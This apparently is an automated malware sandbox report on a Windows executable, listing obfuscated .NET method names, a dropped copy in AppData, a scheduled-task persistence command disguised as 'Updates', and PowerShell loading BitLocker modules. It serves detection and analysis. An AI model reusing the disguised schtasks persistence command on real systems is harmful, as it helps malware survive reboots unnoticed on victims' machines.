Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PAYV6rVjxcGpW3Lffu.cs	High entropy of concatenated method names: 'nI4biSNnAR', 'o6XbIrLd01', 'zpGbLuqO6S', 'LmMbt2I2Pj', 'udPb0kh2i6', 'i97LKq3ctL', 'YlALR60U0g', 'IgELjhF3HJ', 'ofVLS7tliy', 'fHLL5U5i5X'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, vih7cP5nWe4aA5awaD.cs	High entropy of concatenated method names: 'cjkfVjFFbo', 'HxxfkgEj8l', 'ChffgeIXMv', 'HlXf3OtxIE', 'm13fePYSxQ', 'wJkfX0jCMH', 'dD8fo8v3k7', 'cp4fG6Y5aN', 'SKAf1i8baM', 'jeGfw01Hpx'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PVEWPU1cawceWynxlP.cs	High entropy of concatenated method names: 'wmbtYENoAq', 'AyitpWiNOy', 'vW5tnCSnlk', 'hg5tMwhF6q', 'tm2tBxBQjB', 'e2ZtuAqQt9', 'RGVtWyKI7p', 'zQBtvFIZZA', 'd7ttrOh0de', 'oO9tZWsP1x'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, e9vnVJvXef3cnAd7TZ.cs	High entropy of concatenated method names: 'LI4I4OpiqV', 'jqgI8sQP6V', 'vc0IsvQF48', 'EnUIl5dla0', 'n5lIKfa2s0', 'X50IRRE0Jg', 'GD2IjdNdTW', 'jTmISQr8Xb', 'AqZI5p4Usg', 'o7BIxlKANW'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PFugLaIhn3gSB907qC.cs	High entropy of concatenated method names: 'Dispose', 'VGUA5j1Ye3', 'tmKUk4M9s5', 'lGa5DqEURF', 'XUGAx19w9j', 'LfiAz2wmuc', 'ProcessDialogKey', 'P4PUHih7cP', 'zWeUA4aA5a', 'NaDUU8kKqP'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, kO7RRbzNqdcLEk4N6o.cs	High entropy of concatenated method names: 'cbhEuJpOqI', 'U7yEva4HTb', 'QWhEr99SK1', 'ajwEV3X2ow', 'aQ2EkO9phU', 'iO1E3MfbhD', 'TslEekMKvU', 'VBREDUJl3j', 'awmEYKTteD', 'XbwEp92LtN'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.cs	High entropy of concatenated method names: 'C3Tqin4YMP', 'qhlq6qcBP1', 'cBEqIFULeR', 'QCgq2rl8FJ', 'ItvqLMTuH9', 'MPqqbjZjtA', 'yFsqtRNEJh', 'dN5q0XN4t8', 'SdQqdDU5bh', 'bd3qaVG9RM'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, uiDI5s48mgQyTGJUfk.cs	High entropy of concatenated method names: 'uFMFwDGdlP', 'QN7F9oRal0', 'L5yF4yLpsq', 'WtSF8yPbdQ', 'MoQFkTENCo', 'cWUFgMacQe', 'XQtF3JWafa', 'rD5FeTIAds', 'nT0FXssXYe', 'SWFFoRrPdK'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, k5acU6oGHp6rLuXhEB.cs	High entropy of concatenated method names: 'AvPt6a51qR', 'CvIt2QCWR0', 'Wo7tbWVYPm', 'fN2bxXv7W5', 'gZdbz0kXjg', 'yFrtHtBND0', 'xhPtAgyuTV', 'G69tU4udA0', 'w4Utq2g7Vy', 'DkZtCf06bX'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, uTCTviACRji3Yu4Tnva.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'o8JOf51p5g', 'LbhOEbNy72', 'nRPO7VsMs5', 'iuEOO6qh7s', 'FxBOPJjGiA', 'mrfONaFmDq', 'ySKODomf20'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, XruPHkJriYsOwyDPyJ.cs	High entropy of concatenated method names: 'UIOcvK9V6Q', 'BxncrOffaj', 'gukcVHU4su', 'dMSckTkgVS', 'sd6c345uvv', 'EYfceYRMrH', 'jGbcoSbxPx', 'PK2cGkXwTx', 'b3Zcw4xoYX', 'wGccT7ZsGo'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, qOVEovRFvsQVUi8gjw.cs	High entropy of concatenated method names: 'eyamSOZw9X', 'Aopmx4Ti2w', 'TsQhHEv4xH', 'uqihAA488i', 'pUdmT7DZ34', 'baem91LkeK', 'ApHmJPXuyK', 'Cx7m4YfawI', 'Jn8m8n740a', 'BJCmsuxCX2'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, DhsR1FCBNIhCMmXvii.cs	High entropy of concatenated method names: 'ELiAt9vnVJ', 'KefA03cnAd', 'liRAahtDMC', 'EdtAyegLtH', 'uqxAFWr9AY', 'G6rAQjxcGp', 'Y8ZIKh6BA8dYV4qaa6', 'TSQxok1BePHu9Gemk6', 'clZAA702ru', 'NcRAqUoXC2'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, EybHOUAAxXwm6QFEecI.cs	High entropy of concatenated method names: 'k57ExMKQvc', 'kA1EzpI7mp', 'jpH7HIOTC8', 'JPf7AUflLx', 'uo97UdkVO9', 'MWw7qoMW0c', 'iU57Caf4wk', 'sJt7i8njpv', 'jV676bNujA', 'FSQ7IQZIVj'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, PjklEX2XWCOrPMYWlI.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MIIU5H8qyx', 'Pa6Ux7hhpG', 'P9oUzjvljf', 'pdZqHsIbAw', 'hYYqAINDFD', 'pxPqUhsfWX', 'GbKqqdLL9L', 'Gi2m99Iawy5DujcvbrW'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, RkKqPYxylAywnkp0Um.cs	High entropy of concatenated method names: 'KxyE2D4RWy', 'tFXEL8Xfaa', 'brREbyGOvm', 'j9TEtubWZQ', 'IJIEf6rHZi', 'XLaE0yrQrR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, zasVD2AH3v4MkR5a6tM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LLLET02dtB', 'uSgE9DVCwZ', 'R1wEJPEOwt', 'P3mE4vC0IU', 'X4uE8GHPL2', 'yLvEsNf5bA', 'uT7ElwuBDw'
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, pBZQ1xjfYRGUj1Ye35.cs	High entropy of concatenated method names: 'o76fFSnR0S', 'f6kfmbl8Lu', 'J5OffxD1V8', 'Nocf7MD2KH', 'UNTfPP3vjp', 'dA6fDTjJ2O', 'Dispose', 'Jxbh6GOTxg', 'wTihIrOM8I', 'lNYh296XJg'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, vwb3NariRhtDMCrdte.cs	High entropy of concatenated method names: 'x4X2MSSBxG', 'ekP2uPQwPi', 'uBA2vkgWsS', 'HAM2rtXtNE', 'VRP2FpQvHG', 'JED2QfUZNx', 'QHR2mGxk59', 'VVE2hYTtIE', 'A4t2fUeoXw', 'FDu2E8tbWr'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, GQN1FyUPZaWV4I5L4c.cs	High entropy of concatenated method names: 'mrHntEGT3', 'I4IMsvkS6', 'HSpuXLEwA', 'htEWF1YSJ', 'Ee8rOX6aj', 'crYZY6n5D', 'A67jj6qKnLPSGAWp9i', 'nn8VuTpVkrv1Y9o2hK', 'Gurhv8WmP', 'hAyE9V2hP'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PAYV6rVjxcGpW3Lffu.cs	High entropy of concatenated method names: 'nI4biSNnAR', 'o6XbIrLd01', 'zpGbLuqO6S', 'LmMbt2I2Pj', 'udPb0kh2i6', 'i97LKq3ctL', 'YlALR60U0g', 'IgELjhF3HJ', 'ofVLS7tliy', 'fHLL5U5i5X'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, vih7cP5nWe4aA5awaD.cs	High entropy of concatenated method names: 'cjkfVjFFbo', 'HxxfkgEj8l', 'ChffgeIXMv', 'HlXf3OtxIE', 'm13fePYSxQ', 'wJkfX0jCMH', 'dD8fo8v3k7', 'cp4fG6Y5aN', 'SKAf1i8baM', 'jeGfw01Hpx'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PVEWPU1cawceWynxlP.cs	High entropy of concatenated method names: 'wmbtYENoAq', 'AyitpWiNOy', 'vW5tnCSnlk', 'hg5tMwhF6q', 'tm2tBxBQjB', 'e2ZtuAqQt9', 'RGVtWyKI7p', 'zQBtvFIZZA', 'd7ttrOh0de', 'oO9tZWsP1x'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, e9vnVJvXef3cnAd7TZ.cs	High entropy of concatenated method names: 'LI4I4OpiqV', 'jqgI8sQP6V', 'vc0IsvQF48', 'EnUIl5dla0', 'n5lIKfa2s0', 'X50IRRE0Jg', 'GD2IjdNdTW', 'jTmISQr8Xb', 'AqZI5p4Usg', 'o7BIxlKANW'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PFugLaIhn3gSB907qC.cs	High entropy of concatenated method names: 'Dispose', 'VGUA5j1Ye3', 'tmKUk4M9s5', 'lGa5DqEURF', 'XUGAx19w9j', 'LfiAz2wmuc', 'ProcessDialogKey', 'P4PUHih7cP', 'zWeUA4aA5a', 'NaDUU8kKqP'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, kO7RRbzNqdcLEk4N6o.cs	High entropy of concatenated method names: 'cbhEuJpOqI', 'U7yEva4HTb', 'QWhEr99SK1', 'ajwEV3X2ow', 'aQ2EkO9phU', 'iO1E3MfbhD', 'TslEekMKvU', 'VBREDUJl3j', 'awmEYKTteD', 'XbwEp92LtN'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.cs	High entropy of concatenated method names: 'C3Tqin4YMP', 'qhlq6qcBP1', 'cBEqIFULeR', 'QCgq2rl8FJ', 'ItvqLMTuH9', 'MPqqbjZjtA', 'yFsqtRNEJh', 'dN5q0XN4t8', 'SdQqdDU5bh', 'bd3qaVG9RM'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, uiDI5s48mgQyTGJUfk.cs	High entropy of concatenated method names: 'uFMFwDGdlP', 'QN7F9oRal0', 'L5yF4yLpsq', 'WtSF8yPbdQ', 'MoQFkTENCo', 'cWUFgMacQe', 'XQtF3JWafa', 'rD5FeTIAds', 'nT0FXssXYe', 'SWFFoRrPdK'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, k5acU6oGHp6rLuXhEB.cs	High entropy of concatenated method names: 'AvPt6a51qR', 'CvIt2QCWR0', 'Wo7tbWVYPm', 'fN2bxXv7W5', 'gZdbz0kXjg', 'yFrtHtBND0', 'xhPtAgyuTV', 'G69tU4udA0', 'w4Utq2g7Vy', 'DkZtCf06bX'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, uTCTviACRji3Yu4Tnva.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'o8JOf51p5g', 'LbhOEbNy72', 'nRPO7VsMs5', 'iuEOO6qh7s', 'FxBOPJjGiA', 'mrfONaFmDq', 'ySKODomf20'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, XruPHkJriYsOwyDPyJ.cs	High entropy of concatenated method names: 'UIOcvK9V6Q', 'BxncrOffaj', 'gukcVHU4su', 'dMSckTkgVS', 'sd6c345uvv', 'EYfceYRMrH', 'jGbcoSbxPx', 'PK2cGkXwTx', 'b3Zcw4xoYX', 'wGccT7ZsGo'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, qOVEovRFvsQVUi8gjw.cs	High entropy of concatenated method names: 'eyamSOZw9X', 'Aopmx4Ti2w', 'TsQhHEv4xH', 'uqihAA488i', 'pUdmT7DZ34', 'baem91LkeK', 'ApHmJPXuyK', 'Cx7m4YfawI', 'Jn8m8n740a', 'BJCmsuxCX2'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, DhsR1FCBNIhCMmXvii.cs	High entropy of concatenated method names: 'ELiAt9vnVJ', 'KefA03cnAd', 'liRAahtDMC', 'EdtAyegLtH', 'uqxAFWr9AY', 'G6rAQjxcGp', 'Y8ZIKh6BA8dYV4qaa6', 'TSQxok1BePHu9Gemk6', 'clZAA702ru', 'NcRAqUoXC2'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, EybHOUAAxXwm6QFEecI.cs	High entropy of concatenated method names: 'k57ExMKQvc', 'kA1EzpI7mp', 'jpH7HIOTC8', 'JPf7AUflLx', 'uo97UdkVO9', 'MWw7qoMW0c', 'iU57Caf4wk', 'sJt7i8njpv', 'jV676bNujA', 'FSQ7IQZIVj'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, PjklEX2XWCOrPMYWlI.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MIIU5H8qyx', 'Pa6Ux7hhpG', 'P9oUzjvljf', 'pdZqHsIbAw', 'hYYqAINDFD', 'pxPqUhsfWX', 'GbKqqdLL9L', 'Gi2m99Iawy5DujcvbrW'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, RkKqPYxylAywnkp0Um.cs	High entropy of concatenated method names: 'KxyE2D4RWy', 'tFXEL8Xfaa', 'brREbyGOvm', 'j9TEtubWZQ', 'IJIEf6rHZi', 'XLaE0yrQrR', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, zasVD2AH3v4MkR5a6tM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LLLET02dtB', 'uSgE9DVCwZ', 'R1wEJPEOwt', 'P3mE4vC0IU', 'X4uE8GHPL2', 'yLvEsNf5bA', 'uT7ElwuBDw'
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, pBZQ1xjfYRGUj1Ye35.cs	High entropy of concatenated method names: 'o76fFSnR0S', 'f6kfmbl8Lu', 'J5OffxD1V8', 'Nocf7MD2KH', 'UNTfPP3vjp', 'dA6fDTjJ2O', 'Dispose', 'Jxbh6GOTxg', 'wTihIrOM8I', 'lNYh296XJg'

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

File created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
